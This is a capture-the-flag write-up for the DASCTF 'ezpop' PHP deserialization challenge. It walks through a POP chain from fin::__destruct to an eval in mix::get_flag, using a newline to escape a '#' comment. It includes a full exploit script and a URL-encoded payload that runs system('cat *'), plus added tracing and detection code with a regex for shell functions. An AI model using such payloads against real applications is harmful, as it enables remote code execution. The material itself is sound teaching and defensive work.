[DASCTF]ezpop-WP


Here is the challenge source:

```php
<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}
?>
```

A deserialization challenge: first audit the code, then build the POP chain.

fin::__destruct runs automatically when a fin object is destroyed, so the chain starts there.

The echo in __destruct concatenates $this->f1 with a string, which invokes what::__toString when f1 is a what object. __toString calls $this->a->run(); both fin and mix define run(), and I chose mix. mix::run() executes ($this->m1)(), calling the property as a function, which triggers crow::__invoke when m1 is a crow object. __invoke calls world() on $this->v1; fin has no world() method, so fin::__call fires, and __call calls $this->f1->get_flag(), which with f1 set to a mix object reaches mix::get_flag() and its eval for command execution.

Note that eval('#' . $this->m1) in get_flag() prefixes the payload with a # comment marker. Since # only comments out the rest of its line, a leading \n newline in m1 ends the comment and the code that follows it is executed.
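To check the chain analysis above without running anything, here is an added example (not the write-up's or the challenge's code): the same six gadget classes re-declared so that every link logs to a `Trace` class instead of executing, plus a `runChain()` helper that feeds the write-up's payload to `unserialize()` twice, once with defaults and once with `allowed_classes => false`. `Trace` and `runChain` are names chosen for this example; it assumes PHP 8 (where converting an object without `__toString` throws a catchable `Error`).

```php
<?php
// Added example, not part of the write-up or the challenge. The gadget
// classes keep their structure, but each magic method records a line in
// Trace instead of doing anything dangerous, and get_flag() never calls eval.

final class Trace
{
    public static array $log = [];
    public static function add(string $step): void { self::$log[] = $step; }
}

class crow
{
    public $v1;
    public $v2;
    public function __invoke()
    {
        Trace::add('crow::__invoke -> $this->v1->world()');
        $this->v1->world();           // fin has no world(), so fin::__call fires
    }
}

class fin
{
    public $f1;
    public function __destruct()
    {
        Trace::add('fin::__destruct -> string conversion of $this->f1');
        try {
            $s = $this->f1 . '114514';    // what::__toString fires here
        } catch (\Throwable $e) {
            // the inner fin holds a mix, which has no __toString; this Error
            // only surfaces after the chain has already completed
            Trace::add('fin::__destruct -> ' . $e->getMessage());
        }
    }
    public function run() { ($this->f1)(); }
    public function __call($a, $b)
    {
        Trace::add("fin::__call('$a') -> \$this->f1->get_flag()");
        $this->f1->get_flag();
    }
}

class what
{
    public $a;
    public function __toString()
    {
        Trace::add('what::__toString -> $this->a->run()');
        $this->a->run();
        return 'hello';
    }
}

class mix
{
    public $m1;
    public function run()
    {
        Trace::add('mix::run -> ($this->m1)()');
        ($this->m1)();                // m1 is a crow, so crow::__invoke fires
    }
    public function get_flag()
    {
        // The challenge does eval('#' . $this->m1); here we only record the
        // string eval would have received. json_encode makes the "\n" visible.
        Trace::add('mix::get_flag -> eval would receive ' . json_encode('#' . $this->m1));
    }
}

// The write-up's payload, URL-decoded. The "\n" is the newline that ends the # comment.
$payload = 'O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"mix":1:{s:2:"m1";'
         . 'O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";'
         . 's:17:"' . "\n" . 'system(\'cat *\');";}}s:2:"v2";N;}}}}';

function runChain(string $payload, array $options): array
{
    Trace::$log = [];
    $obj = unserialize($payload, $options);
    Trace::add('unserialize() returned ' . get_class($obj));
    unset($obj);                      // last reference dropped: __destruct fires now, if at all
    return Trace::$log;
}

echo "== default unserialize(): every link fires ==\n";
echo implode("\n", runChain($payload, [])), "\n\n";
echo "== unserialize(..., ['allowed_classes' => false]): nothing to chain ==\n";
echo implode("\n", runChain($payload, ['allowed_classes' => false])), "\n";
```

The first run logs the links in the order the write-up describes (__destruct, __toString, run, __invoke, __call, get_flag), which is the quickest way to confirm a chain before touching a target. The second run returns a `__PHP_Incomplete_Class` instead of a `fin`, so no magic method of the real classes is reachable; that option, or not deserializing user input at all, is the fix for this class of bug.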

The exploit:

```php
<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

$fin1=new fin();
$what=new what();
$mix1=new mix();
$mix2=new mix();
$crow=new crow();
$fin2=new fin();
$fin1->f1=$what;   // fin::__destruct -> echo $this->f1 . '114514' -> what::__toString
$what->a=$mix1;    // what::__toString -> $this->a->run() -> mix::run
$mix1->m1=$crow;   // mix::run -> ($this->m1)() -> crow::__invoke
$crow->v1=$fin2;   // crow::__invoke -> $this->v1->world() -> fin::__call (world() does not exist)
$fin2->f1=$mix2;   // fin::__call -> $this->f1->get_flag() -> mix::get_flag
$mix2->m1="\nsystem('cat *');";   // the leading \n ends the # comment in eval('#' . $this->m1)

// When the script ends $fin1 is destroyed here too, so the same chain also
// runs locally and appends hello114514 to the output.
echo urlencode(serialize($fin1));

?>
```

Output:

O%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A4%3A%22what%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3BO%3A4%3A%22crow%22%3A2%3A%7Bs%3A2%3A%22v1%22%3BO%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3Bs%3A17%3A%22%0Asystem%28%27cat+%2A%27%29%3B%22%3B%7D%7Ds%3A2%3A%22v2%22%3BN%3B%7D%7D%7D%7Dhello114514

Send it as the cmd POST parameter with Burp Suite (BP) to get the flag.
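From the defender's side, the same payload can be examined without ever instantiating the gadget classes. The following is an added example (not part of the write-up): `inspectSerialized()` parses the input with `allowed_classes => false`, so every object becomes a `__PHP_Incomplete_Class` and no constructor, `__wakeup`, `__destruct` or `__toString` of the real classes can run, then walks the graph to list the class names, nesting depth and any string property that carries a line break or looks like PHP code. The function names are chosen for this example; the URL-encoded input is the write-up's own payload.

```php
<?php
// Added example, not from the write-up: inspect a serialized request body
// before deciding whether to accept it.

function inspectSerialized(string $data): array
{
    $report = ['classes' => [], 'max_depth' => 0, 'findings' => []];
    // allowed_classes => false: objects are parsed but never become real instances
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== serialize(false)) {
        $report['findings'][] = 'not valid serialized data';
        return $report;
    }
    walk($value, 0, $report);
    // A chain of nested objects is the hallmark of a POP payload; ordinary
    // form data should not need objects at all.
    if ($report['classes'] !== []) {
        $report['findings'][] = 'contains ' . count($report['classes'])
            . ' object(s): ' . implode(' -> ', $report['classes']);
    }
    return $report;
}

function walk($value, int $depth, array &$report): void
{
    $report['max_depth'] = max($report['max_depth'], $depth);
    if ($value instanceof __PHP_Incomplete_Class) {
        // casting exposes the original class name plus the public properties
        $props = (array) $value;
        $report['classes'][] = $props['__PHP_Incomplete_Class_Name'];
        unset($props['__PHP_Incomplete_Class_Name']);
        foreach ($props as $p) {
            walk($p, $depth + 1, $report);
        }
    } elseif (is_array($value)) {
        foreach ($value as $p) {
            walk($p, $depth + 1, $report);
        }
    } elseif (is_string($value)) {
        // The write-up's trick: a line break after eval('#' . ...) ends the comment.
        if (preg_match('/[\r\n]/', $value)) {
            $report['findings'][] = 'string property contains a line break: ' . json_encode($value);
        }
        if (preg_match('/\b(system|exec|passthru|shell_exec|popen|eval)\s*\(/', $value)) {
            $report['findings'][] = 'string property looks like PHP code: ' . json_encode($value);
        }
    }
}

// The write-up's payload exactly as the exploit script printed it (URL-encoded).
$encoded = 'O%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A4%3A%22what%22%3A1%3A%7B'
         . 's%3A1%3A%22a%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3BO%3A4%3A%22crow%22'
         . '%3A2%3A%7Bs%3A2%3A%22v1%22%3BO%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A3%3A'
         . '%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3Bs%3A17%3A%22%0Asystem%28%27cat+%2A%27%29%3B'
         . '%22%3B%7D%7Ds%3A2%3A%22v2%22%3BN%3B%7D%7D%7D%7D';

print_r(inspectSerialized(urldecode($encoded)));
```

Run against the write-up's payload the report lists the six nested objects (fin -> what -> mix -> crow -> fin -> mix) and flags the m1 string for both its leading newline and the system( call; a plain scalar or array payload produces an empty class list and no findings, which is what a legitimate request to an endpoint like this should look like.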
